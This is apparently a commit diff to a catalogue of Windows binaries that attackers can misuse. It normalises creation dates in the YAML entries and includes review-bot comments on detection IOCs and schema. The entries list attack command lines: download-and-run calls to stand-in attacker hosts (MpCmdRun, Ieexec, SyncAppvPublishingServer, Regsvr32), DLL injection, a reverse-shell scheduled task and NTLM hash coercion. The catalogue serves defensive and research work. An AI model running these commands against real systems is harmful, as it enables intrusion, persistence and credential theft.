- IOC: eventvwr.exe launching child process other than mmc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Expand.exe
|
||||
Description: Binary that expands one or more compressed files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Description: Copies source file to destination.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Explorer.exe
|
||||
Description: Binary used for managing files and system components within Windows
|
||||
Author: 'Jai Minton'
|
||||
Created: '2020-06-24'
|
||||
Created: 2020-06-24
|
||||
Commands:
|
||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Extexport.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Extexport.exe c:\test foo bar
|
||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Extrac32.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Findstr.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
@ -42,7 +42,7 @@ Full_Path:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finstr.exe should normally not be invoked on a client system
|
||||
- IOC: findstr.exe should normally not be invoked on a client system
|
||||
Resources:
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
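Review bot: The corrected IOC `findstr.exe should normally not be invoked on a client system` will be noisy: findstr is routinely called from batch files and scripts, so on its own it does not separate this technique from background usage. What is distinctive in the command above (`findstr /V /L ... > c:\ADS\file.txt:file.exe`) is the redirection into an alternate data stream, so I would add `- IOC: findstr.exe output redirected to a path with a ':' stream suffix after the file name (ADS write)` alongside the existing line. In the same hunk `Code_Sample:` holds a single `- Code:` item with no value, which loads as a null entry; the other files in this commit express 'no sample' as `Code_Sample: []`, and that would keep the schema uniform. The lines between this file's two hunks are not shown.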
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Forfiles.exe
|
||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ftp.exe
|
||||
Description: A binary designed for connecting to FTP servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-12-10'
|
||||
Created: 2018-12-10
|
||||
Commands:
|
||||
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
||||
Description: Executes the commands you put inside the text file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: GfxDownloadWrapper.exe
|
||||
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||
Author: Jesus Galvez
|
||||
Created: Jesus Galvez
|
||||
Created: 2019-12-27
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Gpscript.exe
|
||||
Description: Used by group policy to process scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpscript /logon
|
||||
Description: Executes logon scripts configured in Group Policy.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Hh.exe
|
||||
Description: Binary used for processing chm files in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: HH.exe http://some.url/script.ps1
|
||||
Description: Open the target PowerShell script with HTML Help.
|
||||
|
22
yml/OSBinaries/IMEWDBLD.yml
Normal file
22
yml/OSBinaries/IMEWDBLD.yml
Normal file
@ -0,0 +1,22 @@
|
||||
---
|
||||
Name: IMEWDBLD.exe
|
||||
Description: Microsoft IME Open Extended Dictionary Module
|
||||
Author: 'Wade Hickey'
|
||||
Created: '2020-03-05'
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
|
||||
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/notwhickey/status/1367493406835040265
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
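Review bot: This new entry has no `Detection:` and no `Code_Sample:` key at all, whereas the other file added in this commit (Aspnet_Compiler.yml) and the existing entries carry both even when empty (`Detection: []`), so consumers that index on those keys will treat this file differently. Adding `Code_Sample: []` and a Detection block the command supports, e.g. `- IOC: IMEWDBLD.exe started with a URL argument, or outbound HTTP from IMEWDBLD.exe`, would close the gap. `Created: '2020-03-05'` keeps the quotes the rest of the commit strips, and `MitreLink` uses the legacy `/wiki/Technique/T1105` form while the sibling new file uses `https://attack.mitre.org/techniques/T1218/`. The tweet ID in the Resources link appears to date from March 2021, so the 2020 creation date may be a year off; worth confirming with the author.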
|
@ -2,7 +2,7 @@
|
||||
Name: Ie4uinit.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ie4uinit.exe -BaseSettings
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ieexec.exe
|
||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ilasm.exe
|
||||
Description: used for compile c# code into dll or exe.
|
||||
Author: Hai vaknin (lux)
|
||||
Created: 17/03/2020
|
||||
Created: 2020-03-17
|
||||
Commands:
|
||||
- Command: ilasm.exe C:\public\test.txt /exe
|
||||
Description: Binary file used by .NET to compile c# code to .exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Infdefaultinstall.exe
|
||||
Description: Binary used to perform installation based on content inside inf files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Installutil.exe
|
||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Jsc.exe
|
||||
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-05-31'
|
||||
Created: 2019-05-31
|
||||
Commands:
|
||||
- Command: jsc.exe scriptfile.js
|
||||
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Makecab.exe
|
||||
Description: Binary to package existing files into a cabinet (.cab) file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mavinject.exe
|
||||
Description: Used by App-v in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||
Description: Inject evil.dll into a process with PID 3110.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Microsoft.Workflow.Compiler.exe
|
||||
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
||||
Author: 'Conor Richard'
|
||||
Created: '2018-10-22'
|
||||
Created: 2018-10-22
|
||||
Commands:
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mmc.exe
|
||||
Description: Load snap-ins to locally and remotely manage Windows systems
|
||||
Author: '@bohops'
|
||||
Created: '2018-12-04'
|
||||
Created: 2018-12-04
|
||||
Commands:
|
||||
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
||||
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: MpCmdRun.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '09/03/2020'
|
||||
Created: 2020-03-20
|
||||
Commands:
|
||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
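Review bot: The new `Created: 2020-03-20` does not correspond to the removed `'09/03/2020'` under either a DD/MM reading (2020-03-09) or an MM/DD reading (2020-09-03), so this hunk changes the date rather than reformatting it. The other slash-dated entries converted in this commit (Ilasm `17/03/2020` → `2020-03-17`, vbc `27/02/2020` → `2020-02-27`) were read as DD/MM, which would make this entry `Created: 2020-03-09`. Worth checking the file history before merging so the normalization stays a pure format change.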
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msbuild.exe
|
||||
Description: Used to compile and execute code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
@ -20,6 +20,14 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: msbuild.exe project.proj
|
||||
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
|
||||
Usecase: Execute project file that contains XslTransformation tag parameters
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
@ -27,8 +35,9 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
Resources:
|
||||
@ -36,9 +45,12 @@ Resources:
|
||||
- Link: https://github.com/Cn33liz/MSBuildShell
|
||||
- Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Cn33liz
|
||||
Handle: '@Cneelis'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
@ -2,7 +2,7 @@
|
||||
Name: Msconfig.exe
|
||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Msconfig.exe -5
|
||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msdt.exe
|
||||
Description: Microsoft diagnostics tool
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mshta.exe
|
||||
Description: Used by Windows to execute html applications. (.hta)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: mshta.exe evilfile.hta
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msiexec.exe
|
||||
Description: Used by Windows to execute msi files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msiexec /quiet /i cmd.msi
|
||||
Description: Installs the target .MSI file silently.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Netsh.exe
|
||||
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-12-24'
|
||||
Created: 2019-12-24
|
||||
Commands:
|
||||
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Odbcconf.exe
|
||||
Description: Used in Windows for managing ODBC connections
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: odbcconf -f file.rsp
|
||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pcalua.exe
|
||||
Description: Program Compatibility Assistant
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: pcalua.exe -a calc.exe
|
||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pcwrun.exe
|
||||
Description: Program Compatibility Wizard
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pktmon.exe
|
||||
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||
Author: 'Derek Johnson'
|
||||
Created: '2020-08-12'
|
||||
Created: 2020-08-12
|
||||
Commands:
|
||||
- Command: pktmon.exe start --etw
|
||||
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Presentationhost.exe
|
||||
Description: File is used for executing Browser applications
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||
Description: Executes the target XAML Browser Application (XBAP) file
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Print.exe
|
||||
Description: Used by Windows to send files to the printer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Psr.exe
|
||||
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||
Author: Leon Rodenko
|
||||
Created: '2020-06-27'
|
||||
Created: 2020-06-27
|
||||
Commands:
|
||||
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rasautou.exe
|
||||
Description: Windows Remote Access Dialer
|
||||
Author: 'Tony Lambert'
|
||||
Created: '2020-01-10'
|
||||
Created: 2020-01-10
|
||||
Commands:
|
||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Reg.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regasm.exe
|
||||
Description: Part of .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regedit.exe
|
||||
Description: Used by Windows to manipulate registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||
Description: Export the target Registry key to the specified .REG file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regini.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2020-07-03'
|
||||
Created: 2020-07-03
|
||||
Commands:
|
||||
- Command: regini.exe newfile.txt:hidden.ini
|
||||
Description: Write registry keys from data inside the Alternate data stream.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Register-cimprovider.exe
|
||||
Description: Used to register new wmi providers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||
Description: Load the target .DLL.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvcs.exe
|
||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvr32.exe
|
||||
Description: Used by Windows to register dlls
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Replace.exe
|
||||
Description: Used to replace file with another file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Description: Copy file.cab to destination
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rpcping.exe
|
||||
Description: Used to verify rpc connection
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rundll32.exe
|
||||
Description: Used by Windows to execute dll files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Runonce.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Runonce.exe /AlternateShellStartup
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Runscripthelper.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||
Description: Execute the PowerShell script named test.txt
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Sc.exe
|
||||
Description: Used by Windows to manage services
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||
Description: Creates a new service and executes the file stored in the ADS.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Schtasks.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||
Description: Create a recurring task to execute every minute.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Scriptrunner.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Scriptrunner.exe -appvscript calc.exe
|
||||
Description: Executes calc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: SyncAppvPublishingServer.exe
|
||||
Description: Used by App-v to get App-v server lists
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
Description: Example command on how inject Powershell code into the process
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ttdinject.exe
|
||||
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
|
||||
Author: 'Maxime Nadeau'
|
||||
Created: '2020-05-12'
|
||||
Created: 2020-05-12
|
||||
Commands:
|
||||
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
|
||||
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Tttracer.exe
|
||||
Description: Used by Windows 1809 and newer to Debug Time Travel
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-11-5'
|
||||
Created: 2019-11-05
|
||||
Commands:
|
||||
- Command: tttracer.exe C:\windows\system32\calc.exe
|
||||
Description: Execute calc using tttracer.exe. Requires administrator privileges
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: vbc.exe
|
||||
Description: Binary file used for compile vbs code
|
||||
Author: Lior Adar
|
||||
Created: 27/02/2020
|
||||
Created: 2020-02-27
|
||||
Commands:
|
||||
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
|
||||
Description: Binary file used by .NET to compile vb code to .exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Verclsid.exe
|
||||
Description:
|
||||
Author: '@bohops'
|
||||
Created: '2018-12-04'
|
||||
Created: 2018-12-04
|
||||
Commands:
|
||||
- Command: verclsid.exe /S /C {CLSID}
|
||||
Description: Used to verify a COM object before it is instantiated by Windows Explorer
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wab.exe
|
||||
Description: Windows address book manager
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wab.exe
|
||||
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wmic.exe
|
||||
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wscript.exe
|
||||
Description: Used by Windows to execute scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wscript c:\ads\file.txt:script.vbs
|
||||
Description: Execute script stored in an alternate data stream
|
||||
|